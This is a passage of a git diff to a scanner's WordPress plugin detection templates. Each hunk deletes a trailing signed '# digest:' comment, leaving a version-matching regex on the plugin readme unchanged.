4a0a00473045022100ab24329151f03bdefc2ce80deb358f1305f08d8e999da427ecf3886b7e64153a02202d2f23e03e8c869d081097759bb4c69ef93e9ef5d1395c1a51305073b52c49eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index a9d979c0e5..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da4fe179b9b4c7089b548fc06bbc015ce003b9d4b46ea1944bdb53897049fd7f0220059d856a2a8b31a5011801bc2c97901cb26bd2544285d3e60b58691523c7291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 192d4fd0a9..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc56b4d399e4a59e72e8553e014da111a93fc345649f0a2ef06a7ad1708a27ea022100d02d6c0466801c9c541bf03278bf00d29672447626f861c9a84d7e8e90545dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 5fb7ea9a3c..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3a4711b824a1e1081d96ae167a1d55cb5a4256c641d3e112bc8694c76fd033602203ace72fd244107d02b17231f8192a9bcc37a63f07060f877481938340db0ac70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index b277a430d3..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b841d61d2f86424b38c7a93e21c0038922a8c77ca63ca1f69bfb467c38765237022025341015f037bb29f036d00069a17e41dca06455f252d30cfc07785e77128a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 1177d38a77..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e735b105ed63ee23722e5a4f8d18dba49f00cd6c563ab73ef5db7df693f015902203d20d751a8d889ebc7a6c8b8b89bb850cb08d188dc967ce51a46270e3daf3f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index c122d1f057..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8ec4a1f105712de7a2d8e9b5b3fe65f8946a6000626770d302d2b6f468a739302201a29d8088e8f333cbba876560db7f9079af738c529481cda13cbd8af2ddfee54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6d0df5aaab..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee90998c47458e2709b8acb4054512f9a82383bcf4dad743f01b9c3124c4c87c02201142a47b00bcc7df0321ae026493787a5390e19112fc30af34cdb0a60ff7095c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index a20ff68328..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf5a03127cd3cc9563db65b0781e56931696dbd833caf2daab173172da9dd38a022100b6e0b9f929e4582b9c53f27d322c4e66ea96b29a341477c73fe9d768f6073a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 3759654c32..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b30dbdb69a0d3309dcceb706292aaca1f79ffc026931097293b3d2eb1bcaa6800220094f253b5bd2d73c7c93e85f16e4b6af3da84569af061356eb0d20244b77d80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 621761f13e..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220550a62b664c80bb3a191c3f914f48b43fe2fa627b04e9473ce32769bc93a9961022100e6763e3797911f7b483cd6e8489b5ff7eadcd76c5b4483807d24a3d4fe72b60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 8ec465a529..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e19ad19c1de0e35bb88ba8b38a1d34ca17100fd5106f7892840703f277d23ed022100edb4b95a7f2c68a5b2aa1e2df6df4e8597a751e95164ce6bdef1ffe1194c972d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 9704d3bdc4..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201435b6d9c4d926f108b8e4dc4030902de7bf7fd638dc817a0dc753c64d47696e02204e9ecb194d9d1014528aedda893f0dabc9ac80ef5cfc1543a8785a017d951e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 8fbf301aee..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aac647d87b1dc22564132f538ae91918caf8d676cda7f94e6bd748714ce5fbe1022053cf242e74c1841ff2c0a355b86b165edb02464e1b66f6e57142e13c76a95674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index b40772c800..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e94e954f8ab15265bc272850ce5e21531c75b363d7917b1907188f085d6b378902210080b43ed897ac918703098dbadbe5526aa6af3d48b9eda3895c3a6a12e08d26b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 803c525878..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204784fb5600ffd663ad2bff0bd813dc0740f08f5f69b1a04ae7bf3bcf23d18fe4022015371936d5cdc2f5629d00ac27398fbaeed3bd3b3b614a07b8520cb9b7ccdb89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4cf1100abd..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220030b1605a2148bf426b45dda43711c1d41c948c0242cbd769f4d3d8a2434036102210095c2b2fdf8fd937bc89aafc185187fadbdb2bc6566c0bb6284b6ad55ecb999c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 038e6619da..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220649cc00b8752020c6ada49c61addff74a31d6d150cd86d66c090e89c1b6a816502206539c70f1f27639d3a93059b878eab9fb10d612e9fb3453f26c2ad52dcf64479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 1a1ae3c440..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb0914fd3e1eec1f734722906ae3b3c298b9da5abc08d98d1274fa9df4cf1e8802210080e5e8e03353803b0fcea7f986ba2caed1c3d2077fe2ad6aef85e0499d86bfeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 27f321fecf..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085fa5c61a020f03505e0a518b6b1bc2f05354dcb9685a0cf806c67c8291177820220790943a11d295a4af764d96d09a4603e8bf02a87c8756be5fad9783c9b577c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 62bbb0b883..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8a908894c2494a6322820e9ac1d07883a0019d3df3e11f685b5cb06beacaeaf022100ad0d5adfe0b6dfac60a257749031bda3a46d98941449418173814d4ac20fb064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index e4b5536e84..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e077c85747996fcec2037f426938a40b82fbe10914df0184e5ca7e2736ef3f502207658548bfc080f39b2b770df08454856bb19c87591f0beb623aca9fdfd9ecb51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 065a95456e..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220724e7b4aee59c4ea617c59bc2fa442009cb1ef16527ac5e71fd224208092a280022061e345736f255b9a1cfd67087056155880e3648cd43f6bdeeb5185bcf930c764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6ffdcae524..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a48cd636d3048eab3157d063d4e35af4d1646a0c230f4f1cb040b1ca0943233022100f16243d95c799e0c8ebc6cbbcee5039316b1cddc152b060ff45bb5087f84fc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 91c580f389..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f926ca83c02a199013f4eeea6a7ea7f75f0b2578ea2becba0f87e6b1cf27a1b022100bed67dbd2468de67325cbd23b57be9de2c8eb97e19d1d4a4b41d52193858c118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 33b88b8b66..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f8fa4f6528634198fc92c04b0fa411c50e3ebe0269959caa8fa91ef750b1e99022062476d32dc5337a1e1f20a2443141b44370adb686e8650cc57f5c5777e54f062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index e68a4ff4f9..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ffd38d548b60af8903f22f5cd8b6145133673c51e51ea0ba0a60e8fde33898a022032b92b60ffa578397b3d449f5959847f7a80b475f3258e760b445e69d97e3b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index ac6e4fa500..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f396796023ce2494b9212462490c32a4f05637c9e95b0d3f3784461a7a920cf4022012eea0f57c50533a7e25976c0bda1c2d58211766ed64478180c51fe7239b9d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index eaa6055705..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206647404eed2a17708f789c643a269d9a972e8c3806e9ccd2e3972415b903d6bb02210096e8ed55043e9d0fe709895b301485a48359c769663a3e391f9a4478304556bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 9079d50df2..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f7d4586849b93fd153002dc2a3022ff105ab0948d0fbd467ddf633d93a5d33a022064b62e813fe732b75527a4b8e5773fb71a98ff91ee883b050daa092e3896fb24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index e9dc6baad1..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036cc66d181fb06ce72a320b042b7d550382a8cfa3efbb23700c6789f86f7237e0221009086fa6d73425624829c00e7a79119a09c14539aea7e0e9dbed0e952c647221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index af1cbb5cf8..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000b14f288c81f9421b2c30b343f631d99c436c250edaf810f084224c1adee4cc0220352e66a35411c9883500585d77937335e9c844c6f0454e699c8429468703242e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 5c6d0b995c..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091e2e8b922c8a2026e6602cad8b94edcdf612fed6afa4a2e6af0613c2909558302206e61b7d2203ba5b26d018001e0c8761a682b1949d58611cd0e2fa940c1866f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 2c9e58e1c5..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b885cd246f9fb3216f360417f9e86e4781c6a614edb92dd43d55fadd4b115657022066301b2be2a4ca80d489db7e3ae5b9bf620c11283e4dfa95de8b0781ac0e5572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8eca733fa9..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220103fe5c28ad3ac28cb238e54d600b136fd135520a3e33b3bca96bb21d76a45af022100bd35203cbe8aea1f3fb804c43f34cb6a666e1356cf3fa21ed91b1a4bead4371d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 804e0a64b3..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fb74667a3b653dfac98bd348a2e3dea60c627366145def6eb65e7b22ffcf6e1d02210099746b49689cdc5fe242d9a789f8995b82889c40264aa820089b6c339d76f055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 919e783879..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6accdbfccd442da9a0430f5a15e3f682c2db0b9b7d190d79a4a8cf8dc489051022100994bb2518264867bda598c47384d06dbb5fb0ca8ebba776765a59b61b3f51adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 88c9255d63..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068a08f68017ddf6a92c6752d7913e7d0630497b14817f15cefd84d69bb54f37802202dcafeb04a3bc9c2452487d7cb7cdd0600b5abf41bb25049491aed0c66bc5d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7aa1c995ae..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022029cbb84d9753207b18fe550ed6c5f26c1472fed014e408c91b903e705d81fd46022064f5b4779f2ab2c414f007a1ab093d74608e470f104794237a9b0c54fff5e657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 84d1a3c0f2..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f043fd5fa3349fd243eecf64fd67b8a86564d88ef94ec7346fa108e89788cad022100a8484d125349c90c9b11f76983b5c89e4e4f27f3644bd6d899e92c35b38f4d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 26a7ab1381..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df97bbba45f43516c28f7559b51dea13b23e354a163006d14a6bfd3b2c6a514b022012cb2669d4267f8ddcf014c5ab48dfdc6cbe70326b3edc03b8e3367c3fe32ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4edb7b77ad..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f627ee87b0a111c81039f054a65e8ed24c319fd04029b98a38269655cc81a914022100ed088677b7cf4d24d94851deb2ec72feeb772f1cbffe9b1d2a797e1437dca62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 0828541128..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008017f11f633f13e08b8d231d95e8a66cd0398df41b6dba40c8344da5e4d4f61602203a222d82cf95d18df709be0af986c0b73e0ba3dbec8e74a984ee62e1138f04e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index ec01702d31..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b824556500fe06c2369b62667587ef060da943470a34116c2612997c869b29e022100be277a0777ec4259cfa64f0e836ab9aac9406ad633c0eb4823ab13428816bbe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 0ac50c7314..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061b684b6ace70738b9880c5f8e897231e015b6db0dc0c7b5257ff0e8b81fc6b7022100d79c3ac7cd7e454377234fedb4b618952c1a84aac54ac3da9b9d0d656473acd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 0065f43615..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a004530430220381ad88368fd5554f56505dbc7fbb2a28186cb3e7336272e36d3af3392eac7dd021f614302bb216c10edb6549d3e740daad905f3dc2056986dc7843cff1fadbf5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index dedb6d5d51..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079bb853a4a0cee414cc04176eb95725e4c3f7c930132761c159ff66fc4fe12d802206e7ae07ac119f0a50c59908c36d50b1d68dd2079bd26cd60d3262de7813e995b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 4f4741ab15..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 